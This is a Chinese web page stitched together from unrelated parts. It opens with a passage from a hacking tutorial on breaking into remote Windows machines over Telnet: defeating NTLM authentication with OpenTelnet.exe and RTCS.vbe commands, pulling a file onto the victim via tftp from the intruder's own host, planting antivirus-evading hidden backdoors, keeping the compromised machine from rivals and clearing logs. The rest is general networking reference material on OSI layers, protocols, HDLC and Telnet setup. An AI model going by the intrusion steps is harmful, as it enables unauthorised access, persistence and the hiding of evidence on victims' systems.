1、客戶端首先在本地加密當前用戶的密碼成為密碼散列
2、客戶端向伺服器發送自己的帳號,這個帳號是沒有經過加密的,明文直接傳輸
3、伺服器產生一個16位的隨機數字發送給客戶端,作為一個 challenge(挑戰)
4、客戶端再用加密後的密碼散列來加密這個 challenge ,然後把這個返回給伺服器。作為 response(響應)
5、伺服器把用戶名、給客戶端的challenge 、客戶端返回的 response 這三個東西,發送域控制器
6、域控制器用這個用戶名在 SAM密碼管理庫中找到這個用戶的密碼散列,然後使用這個密碼散列來加密 challenge。
7、域控制器比較兩次加密的 challenge ,如果一樣,那麼認證成功。
從上面的過程我們可以看出,NTLM是以當前用戶的身份向Telnet伺服器發送登錄請求的,而不是用你掃到的對方管理員的帳戶和密碼登錄,顯然,你的登錄將會失敗。舉個例子來說,你家的機器名為A(本地機器),你入侵的機器名為B(遠地機器),你在A上的帳戶是xinxin,密碼是1234,你掃到B的管理員帳號是Administrator,密碼是5678,當你想Telnet到B時,NTLM將自動以當前用戶的帳號和密碼作為登錄的憑據來進行上面的7項操作,即用xinxin和1234,而並非用你掃到的Administrator和5678,且這些都是自動完成的,根本不給你插手的機會,因此你的登錄操作將失敗。
由於Telnet伺服器對NTLM的使用有3個選項,所以當你Telnet遠地機器時,會顯示下面情況中的一種:
1)身份驗證選項=0時
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\為0時不使用NTML身份驗證,直接輸入用戶名和密碼,比如你可以輸入掃到的Administrator和5678
2)身份驗證選項=1時
=====================================
NTLM Authentication failed e to insufficient credentials. Please login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\先嘗試 NTLM 身份驗證,如果失敗,再使用用戶名和密碼,其實這種方式對於我們來說,與上一種方式沒什麼區別
3)身份驗證選項=2時
=====================================
NTLM Authentication failed e to insufficient credentials. Please login withclear text username and password
Server allows NTLM authentication only
Server has closed connection
遺失對主機的連接。
C:\>
\\仔細看看上面的顯示,根本沒有給你輸入用戶名和密碼的機會,直接斷開連接,掃到了密碼也是白掃
所以對於入侵者來說,NTLM是橫在我們面前的一座大山,必須要除掉它,一般我們有如下幾種方法:
1通過修改遠程注冊表更改telnet伺服器配置,將驗證方式從2改為1或0;
2使用NTLM.exe,上傳後直接運行,可將telnet伺服器驗證方式從2改為1;
3在本地建立掃描到的用戶,以此用戶身份開啟telnet客戶機並進行遠程登錄;
4使用軟體,比如opentelnet.exe(需要管理員許可權且開啟IPC管道)
5使用腳本,如RTCS,(需要管理員許可權但不依賴IPC管道)
基本上是以上的5種,其中後兩種是我們比較常用的開telnet的手法,而且使用方法十分簡單,命令如下:
OpenTelnet.exe \\server username password NTLMAuthor telnetport
OpenTelnet.exe \\伺服器地址 管理員用戶名 密碼 驗證方式(填0或1) telnet埠
cscript RTCS.vbe targetIP username password NTLMAuthor telnetport
cscript RTCS.vbe <目標IP> <管理員用戶名> <密碼> <驗證方式> <tlnet埠>
五 在telnet中該做什麼
本來寫到上面就想結束了,不過許多朋友都說telnet上去後不知道該做什麼了,既然這樣,那我就拋磚引玉吧,這次不講具體做法,只是說說思路,什麼?為什麼不講具體做法?篇幅不夠嘛,以後我會一一解釋的。
1 查看系統信息
呵呵,其實就是隨處看看,看看他的系統配置和版本(用type c:\boot.ini來知道pro版或server版),看看都裝了什麼服務或軟體(從目錄名就可以知道了),看看有什麼重要或有趣的文件啦(唉,要是國外的機器,看也看不懂),看看他的用戶情況,總之就是盡可能多的了解系統,為一會裝後門摸底。
2 使用tftp傳送文件
想必大家都遇到過在telnet中傳輸文件的問題,因為我們習慣了在ipc管道中的文件傳輸,所以有些朋友喜歡用net share ipc$ 來打開管道,進而利用來傳輸文件。不過這樣反而麻煩,既然我們已經得到了shell,我們可以用TFPT命令來完成這一切,什麼是TFTP呢?
用TFTP(Trivial File Transfer Protocol)來實現文件的傳送是一種基於UDP連接的文件傳輸,一般是使用Windows自帶的tftp.exe和一個TFTP伺服器端軟體構成一個完整的傳輸結構。它是這樣使用的: 首先運行本地的TFTP Server(比如tftpd32.exe)軟體並保證始終開啟直至傳輸全部完成, 然後在telnet中(當然你也可以在其他shell中)運行下面的命令:
C:\>tftp –i ip get xinxin.exe c:\abc\xinxin.exe
其中ip為你自己機器的ip,且上傳文件要與TFTP伺服器端在同一目錄下,這樣你就可以把xinxin.exe上傳到c盤abc目錄下了(其實是從tftp伺服器下載來的)
需要指出的是,如果使用代理IP,你將不能實現與外部網路的文件傳送。因為你的代理網關在進行數據封裝的時候會將自己的IP地址加入到你的數據報中,代替你的內部網路地址,所以在外部網路進行MAC定址時是找不到你這台TFTP伺服器的。
3 安置後門
安置後門放在第二步好像早了點,如果你入侵還有其他目的,比如以破壞為主,或者是來修改主頁的,那麼這些事情當然可以在安置後門之前做;如果你只是想得到一隻肉雞,那就沒什麼可說的了,安後門吧。
後門的種類繁多,也給我們提供了很大的選擇餘地,能夠根據具體情況選擇合適的後門的確是一門學問。常用的後門一般有:木馬,asp木馬,遠程式控制制軟體,克隆帳戶,建立並隱藏帳戶,telnet,telnet擴展的shell,終端服務等。安置一個好的後門通常要注意以下幾點:
1 不會被防火牆查殺及阻礙通信:被加入病毒庫的後門最好加殼以逃過防火牆,盡量用低埠通信,以免被防火牆屏蔽。
2 最大限度增加隱蔽性:如果你選擇遠程式控制制軟體,要注意被控端的安裝提示和小圖標,以及是否同步畫面;如果你在帳戶上做文章,要盡量保持在cmd和用戶管理中都不出破綻;如果你選擇放木馬或telnet擴展,要注意文件和進程的隱藏;如果新開了終端服務(入侵前並沒有開),一定要該掉3389這個顯眼的埠,且越低越好。
3 不要當管理員不存在:這是一個大忌,許多朋友在只有默認帳戶的機器上建立類似'hacking'的管理員帳戶,真是無知者無畏呀。所以安置後門的時候,想想管理員疏忽的地方會在哪裡。
4 打補丁
如果想獨霸肉雞,就要會打補丁,要知道對肉雞的競爭是很激烈的。怎麼打補丁呢?這個也要問?想想你是怎麼進來的吧。算了,提示一下,除了修補大的漏洞以外(上傳官方補丁並運行),也要注意它的共享,ipc$共享(最好都關閉),可疑埠,容易被利用的服務等。不過打補丁也要注意隱蔽性的,不要讓管理員發現大的改動。
5 清除日誌
可以手動或利用軟體,如果不太會就去找相關教材吧,在這里我不詳細介紹了。
六 結束語
文章的前部分主要說了一些原理性的東西,後部分則側重於應用,寫的多了難免會有些遺漏,如果你覺得哪裡還需要補充,或者哪裡不明白,請回帖告訴我喲!!
參考資料:http://www.xfocus.net/articles/200307/567.html
我轉的帖子
Ⅳ 遠程連接協議有哪些
物理層協議:802.11a(5ghz)IEEE802.15(藍牙技術)IEEE802.16(固定寬頻無線)IEEE802.3
數據鏈路層協議:IEEE802.3(乙太網)、幀中繼、ATM、IEEE802.11、HDLC
網路層協議:IP、ICMP、ARP
傳輸層協議:TCP、UDP
應用層協議:HTTP、HTTPS、SSH、SMTP、FTP、TFTP、TELNET
Ⅵ 遠程配置網路設備時,網路管理員應使用哪種網路協議
常用協議。遠程配置網路設備是通過Console埠直接訪問Console埠是路由器和交換機設備的基本埠,網路管理員應使用常用網路協議,是我們對一台新的路由器或交換機配置時必須採用的一種方法,提供簡單Web服務的能力,用戶可以使用瀏覽器來訪問和控制網路設備。
Ⅶ 常用的網路協議有哪些
一、OSI模型
名稱 層次 功能
物理層 1 實現計算機系統與網路間的物理連接
數據鏈路層 2 進行數據打包與解包,形成信息幀
網路層 3 提供數據通過的路由
傳輸層 4 提供傳輸順序信息與響應
會話層 5 建立和中止連接
表示層 6 數據轉換、確認數據格式
應用層 7 提供用戶程序介面
二、協議層次
網路中常用協議以及層次關系
1、 進程/應用程的協議
平時最廣泛的協議,這一層的每個協議都由客程序和服務程序兩部分組成。程序通過伺服器與客戶機交互來工作。常見協議有:Telnet、FTP、SMTP、HTTP、DNS等。
2、 主機—主機層協議
建立並且維護連接,用於保證主機間數據傳輸的安全性。這一層主要有兩個協議:
TCP(Transmission Control Protocol:傳輸控制協議;面向連接,可靠傳輸
UDP(User Datagram Protocol):用戶數據報協議;面向無連接,不可靠傳輸
3、 Internet層協議
負責數據的傳輸,在不同網路和系統間尋找路由,分段和重組數據報文,另外還有設備定址。些層包括如下協議:
IP(Internet
Protocol):Internet協議,負責TCP/IP主機間提供數據報服務,進行數據封裝並產生協議頭,TCP與UDP協議的基礎。
ICMP(Internet Control Message
Protocol):Internet控制報文協議。ICMP協議其實是IP協議的的附屬協議,IP協議用它來與其它主機或路由器交換錯誤報文和其它的一些網路情況,在ICMP包中攜帶了控制信息和故障恢復信息。
ARP(Address Resolution Protocol)協議:地址解析協議。
RARP(Reverse Address Resolution Protocol):逆向地址解析協議。
OSI 全稱(Open System Interconnection)網路的OSI七層結構2008年03月28日 星期五
14:18(1)物理層——Physical
這是整個OSI參考模型的最低層,它的任務就是提供網路的物理連接。所以,物理層是建立在物理介質上(而不是邏輯上的協議和會話),它提供的是機械和電氣介面。主要包括電纜、物理埠和附屬設備,如雙絞線、同軸電纜、接線設備(如網卡等)、RJ-45介面、串口和並口等在網路中都是工作在這個層次的。
物理層提供的服務包括:物理連接、物理服務數據單元順序化(接收物理實體收到的比特順序,與發送物理實體所發送的比特順序相同)和數據電路標識。
(2)數據鏈路層——DataLink
數據鏈路層是建立在物理傳輸能力的基礎上,以幀為單位傳輸數據,它的主要任務就是進行數據封裝和數據鏈接的建立。封裝的數據信息中,地址段含有發送節點和接收節點的地址,控制段用來表示數據連接幀的類型,數據段包含實際要傳輸的數據,差錯控制段用來檢測傳輸中幀出現的錯誤。
數據鏈路層可使用的協議有SLIP、PPP、X.25和幀中繼等。常見的集線器和低檔的交換機網路設備都是工作在這個層次上,Modem之類的撥號設備也是。工作在這個層次上的交換機俗稱「第二層交換機」。
具體講,數據鏈路層的功能包括:數據鏈路連接的建立與釋放、構成數據鏈路數據單元、數據鏈路連接的分裂、定界與同步、順序和流量控制和差錯的檢測和恢復等方面。
(3)網路層——Network
網路層屬於OSI中的較高層次了,從它的名字可以看出,它解決的是網路與網路之間,即網際的通信問題,而不是同一網段內部的事。網路層的主要功能即是提供路由,即選擇到達目標主機的最佳路徑,並沿該路徑傳送數據包。除此之外,網路層還要能夠消除網路擁擠,具有流量控制和擁擠控制的能力。網路邊界中的路由器就工作在這個層次上,現在較高檔的交換機也可直接工作在這個層次上,因此它們也提供了路由功能,俗稱「第三層交換機」。
網路層的功能包括:建立和拆除網路連接、路徑選擇和中繼、網路連接多路復用、分段和組塊、服務選擇和流量控制。
(4)傳輸層——Transport
傳輸層解決的是數據在網路之間的傳輸質量問題,它屬於較高層次。傳輸層用於提高網路層服務質量,提供可靠的端到端的數據傳輸,如常說的QoS就是這一層的主要服務。這一層主要涉及的是網路傳輸協議,它提供的是一套網路數據傳輸標准,如TCP協議。
傳輸層的功能包括:映像傳輸地址到網路地址、多路復用與分割、傳輸連接的建立與釋放、分段與重新組裝、組塊與分塊。
根據傳輸層所提供服務的主要性質,傳輸層服務可分為以下三大類:
A類:網路連接具有可接受的差錯率和可接受的故障通知率(網路連接斷開和復位發生的比率),A類服務是可靠的網路服務,一般指虛電路服務。
C類:網路連接具有不可接受的差錯率,C類的服務質量最差,提供數據報服務或無線電分組交換網均屬此類。
B類:網路連接具有可接受的差錯率和不可接受的故障通知率,B類服務介於A類與C類之間,在廣域網和互聯網多是提供B類服務。
網路服務質量的劃分是以用戶要求為依據的。若用戶要求比較高,則一個網路可能歸於C型,反之,則一個網路可能歸於B型甚至A型。例如,對於某個電子郵件系統來說,每周丟失一個分組的網路也許可算作A型;而同一個網路對銀行系統來說則只能算作C型了。
(5)會話層——Senssion
會話層利用傳輸層來提供會話服務,會話可能是一個用戶通過網路登錄到一個主機,或一個正在建立的用於傳輸文件的會話。
會話層的功能主要有:會話連接到傳輸連接的映射、數據傳送、會話連接的恢復和釋放、會話管理、令牌管理和活動管理。
(6)表示層——Presentation
表示層用於數據管理的表示方式,如用於文本文件的ASCII和EBCDIC,用於表示數字的1S或2S補碼表示形式。如果通信雙方用不同的數據表示方法,他們就不能互相理解。表示層就是用於屏蔽這種不同之處。
表示層的功能主要有:數據語法轉換、語法表示、表示連接管理、數據加密和數據壓縮。
(7)應用層——Application
這是OSI參考模型的最高層,它解決的也是最高層次,即程序應用過程中的問題,它直接面對用戶的具體應用。應用層包含用戶應用程序執行通信任務所需要的協議和功能,如電子郵件和文件傳輸等,在這一層中TCP/IP協議中的FTP、SMTP、POP等協議得到了充分應用。
SNMP(Simple Network Management
Protocol,簡單網路管理協議)的前身是簡單網關監控協議(SGMP),用來對通信線路進行管理。隨後,人們對SGMP進行了很大的修改,特別是加入了符合Internet定義的SMI和MIB:體系結構,改進後的協議就是著名的SNMP。SNMP的目標是管理互聯網Internet上眾多廠家生產的軟硬體平台,因此SNMP受Internet標准網路管理框架的影響也很大。現在SNMP已經出到第三個版本的協議,其功能較以前已經大大地加強和改進了。
SNMP的體系結構是圍繞著以下四個概念和目標進行設計的:保持管理代理(agent)的軟體成本盡可能低;最大限度地保持遠程管理的功能,以便充分利用Internet的網路資源;體系結構必須有擴充的餘地;保持SNMP的獨立性,不依賴於具體的計算機、網關和網路傳輸協議。在最近的改進中,又加入了保證SNMP體系本身安全性的目標。
OSPF(Open Shortest Path First開放式最短路徑優先)是一個內部網關協議(Interior Gateway
Protocol,簡稱IGP),用於在單一自治系統(autonomous
system,AS)內決策路由。與RIP相對,OSPF是鏈路狀態路由協議,而RIP是距離向量路由協議。
RIP(Routing information Protocol)是應用較早、使用較普遍的內部網關協議(Interior Gateway
Protocol,簡稱IGP),適用於小型同類網路,是典型的距離向量(distance-vector)協議。文檔見RFC1058、RFC1723。
RIP通過廣播UDP報文來交換路由信息,每30秒發送一次路由信息更新。RIP提供跳躍計數(hop
count)作為尺度來衡量路由距離,跳躍計數是一個包到達目標所必須經過的路由器的數目。如果到相同目標有二個不等速或不同帶寬的路由器,但跳躍計數相同,則RIP認為兩個路由是等距離的。RIP最多支持的跳數為15,即在源和目的網間所要經過的最多路由器的數目為15,跳數16表示不可達
CSMA/CD(Carrier Sense Multiple Access/Collision Detect)
即載波監聽多路訪問/沖突檢測方法
一、基礎篇:
是一種爭用型的介質訪問控制協議。它起源於美國夏威夷大學開發的ALOHA網所採用的爭用型協議,並進行了改進,使之具有比ALOHA協議更高的介質利用率。
CSMA/CD控制方式的優點是:
原理比較簡單,技術上易實現,網路中各工作站處於平等地位 ,不需集中控制,不提供優先順序控制。但在網路負載增大時,發送時間增長,發送效率急劇下降。
CSMA/CD應用在 ISO7層里的數據鏈路層
它的工作原理是: 發送數據前 先監聽信道是否空閑 ,若空閑
則立即發送數據.在發送數據時,邊發送邊繼續監聽.若監聽到沖突,則立即停止發送數據.等待一段隨即時間,再重新嘗試.
二、進階篇:
CSMA/CD控制規程:
控制規程的核心問題:解決在公共通道上以廣播方式傳送數據中可能出現的問題(主要是數據碰撞問題)
控制過程包含四個處理內容:偵聽、發送、檢測、沖突處理
(1) 偵聽:
通過專門的檢測機構,在站點准備發送前先偵聽一下匯流排上是否有數據正在傳送(線路是否忙)?
若「忙」則進入後述的「退避」處理程序,進而進一步反復進行偵聽工作。
若「閑」,則一定演算法原則(「X堅持」演算法)決定如何發送。
(2) 發送:
當確定要發送後,通過發送機構,向匯流排發送數據。
(3) 檢測:
數據發送後,也可能發生數據碰撞。因此,要對數據邊發送,邊接收,以判斷是否沖突了。(參5P127圖)
(4)沖突處理:
當確認發生沖突後,進入沖突處理程序。有兩種沖突情況:
① 偵聽中發現線路忙
② 發送過程中發現數據碰撞
① 若在偵聽中發現線路忙,則等待一個延時後再次偵聽,若仍然忙,則繼續延遲等待,一直到可以發送為止。每次延時的時間不一致,由退避演算法確定延時值。
② 若發送過程中發現數據碰撞,先發送阻塞信息,強化沖突,再進行偵聽工作,以待下次重新發送(方法同①)
面向比特的協議中最有代表性的是IBM的同步數據鏈路控制規程SDLC(Synchronous Data Link Control),國際標准化組織ISO
(International Standards Organization)的高級數據鏈路控制規程HDLC(High Level Data Link
Control),美國國家標准協會(American National Standar ds Institute )的先進數據通信規程ADCCP (
Advanced Data Communications Control
Procere)。這些協議的特點是所傳輸的一幀數據可以是任意位,而且它是靠約定的位組合模式,而不是靠特定字元來標志幀的開始和結束,故稱"面向比特"的協議。
二.幀信息的分段
SDLC/HDLC的一幀信息包括以下幾個場(Field),所有場都是從最低有效位開始傳送。
1. SDLC/HDLC標志字元
SDLC/HDLC協議規定,所有信息傳輸必須以一個標志字元開始,且以同一個字元結束。這個標志字元是01111110,稱標志場(F)。從開始標志到結束標志之間構成一個完整的信息單位,稱為一幀(Frame)。所有的信息是以幀的形式傳輸的,而標志字元提供了每一幀的邊界。接收端可以通過搜索"01111110"來探知幀的開頭和結束,以此建立幀同步。
2.地址場和控制場
在標志場之後,可以有一個地址場A(Address)和一個控制場C(Contro1)。地址場用來規定與之通信的次站的地址。控制場可規定若干個命令。SDLC規定A場和C場的寬度為8位。HDLC則允許A場可為任意長度,C場為8位或16位。接收方必須檢查每個地址位元組的第一位,如果為"0",則後邊跟著另一個地址位元組;若為"1",則該位元組就是最後一個地址位元組。同理,如果控制場第一個位元組的第一位為"0",則還有第二個控制場位元組,否則就只有一個位元組。
3.信息場
跟在控制場之後的是信息場I(Information)。I場包含有要傳送的數據,亦成為數據場。並不是每一幀都必須有信息場。即信息場可以為0,當它為0時,則這一幀主要是控制命令。
4.幀校驗場
緊跟在信息場之後的是兩位元組的幀校驗場,幀校驗場稱為FC(Frame Check)場, 校驗序列FCS(Frame check
Sequence)。SDLC/HDLC均採用16位循環冗餘校驗碼CRC (Cyclic Rendancy
Code),其生成多項式為CCITT多項式X^16+X^12+X^5+1。除了標志場和自動插入的"0"位外,所有的信息都參加CRC計算。
CRC的編碼器在發送碼組時為每一碼組加入冗餘的監督碼位。接收時解碼器可對在糾錯范圍內的錯碼進行糾正,對在校錯范
圍內的錯碼進行校驗,但不能糾正。超出校、糾錯范圍之外的多位錯誤將不可能被校驗發現 。
三.實際應用時的兩個技術問題
1."0"位插入/刪除技術
如上所述,SDLC/HDLC協議規定以01111110為標志位元組,但在信息場中也完全有可能有同一種模式的字元,為了把它與標志區分開來,所以採取了"0"位插入和刪除技術。具體作法是發送端在發送所有信息(除標志位元組外)時,只要遇到連續5個"1",就自動插入一個"0"當接收端在接收數據時(除標志位元組)如果連續接收到5個"1",就自動將其後的一個"0"刪除,以恢復信息的原有形式。這種"0"位的插入和刪除過程是由硬體自動完成的,比上述面向字元的"數據透明"容易實現。
2. SDLC/HDLC異常結束
若在發送過程中出現錯誤,則SDLC/HDLC協議用異常結束(Abort)字元,或稱失效序列使本幀作廢。在HDLC規程中7個連續的"1"被作為失效字元,而在SDLC中失效字元是8個連續的"1"。當然在失效序列中不使用"0"位插入/刪除技術。
SDLC/HDLC協議規定,在一幀之內不允許出現數據間隔。在兩幀信息之間,發送器可以連續輸出標志字元序列,也可以輸出連續的高電平,它被稱為空閑(Idle)信號。
Ⅷ 如何在Windows系統上利用Telnet協議連接Linux伺服器
如何利用Telnet連接Linux伺服器?Telnet協議是Internet遠程登錄服務的標准協議,它為用戶提供了在本地計算機上完成遠程主機工作的能力。很多終端使用者都習慣在計算機上利用Telnet會話來遠程式控制制伺服器,下面分享連接方法 Telnet協議是Internet遠程登錄服務的標准協議,它為用戶提供了在本地計算機上完成遠程主機工作的能力。很多終端使用者都習慣在計算機上利用Telnet會話來遠程式控制制伺服器。這里小編就分兩步為大家演示如何在Windows系統上利用Telnet協議連接Linux伺服器。 步驟一:在Windows系統上打開Telnet功能; 步驟二:在Linux系統上啟用Telnet服務。 步驟一:Windows終端開啟Telnet功能 1/由於在Windows Vista之後的版本默認並沒有提供Telnet功能。如果需要使用Telnet就必須打開此項功能。以Windows7為例,首先打開控制面板。 2/然後在控制面板中打開「程序和功能」。 3/再在左上角點擊「打開或關閉Windows功能」。 4/在「打開或關閉Windows功能」對話框中勾選「Telnet客戶端」,點擊確定,系統會自動安裝。到此Windows終端的工作已經完成。 步驟二:Linux伺服器開啟Telnet服務 1、許多Linux系統在默認情況下是不安裝Telnet服務的,如果需要使用就必須安裝此項服務。安裝的方法有很多,小編在這里只介紹yum安裝Telnet服務,它的優點是能夠自動檢查安裝包的依賴文件不用人為干預,當然前提是系統必須聯網。在提示符下輸入「yum install -y telnet-server」命令安裝Telnet服務。最後出現Complete,代表安裝完成。 2、使用命令「vi/etc/xinetd.d/telnet」編輯Telnet的配置文件,將disable的值改成no。 3、重啟啟動xinetd服務,使得telnet配置生效。 4、在Linux伺服器上打開Telnet協議的23埠。使用命令「vi/etc/sysconfig/iptables」添加紅框內的代碼,保存。 5、重新啟動iptables,使得防火牆策略生效。 6、在Windows上,用「telnet IP地址」命令,再輸入用戶名和密碼,就可以完成Linux伺服器的遠程登錄。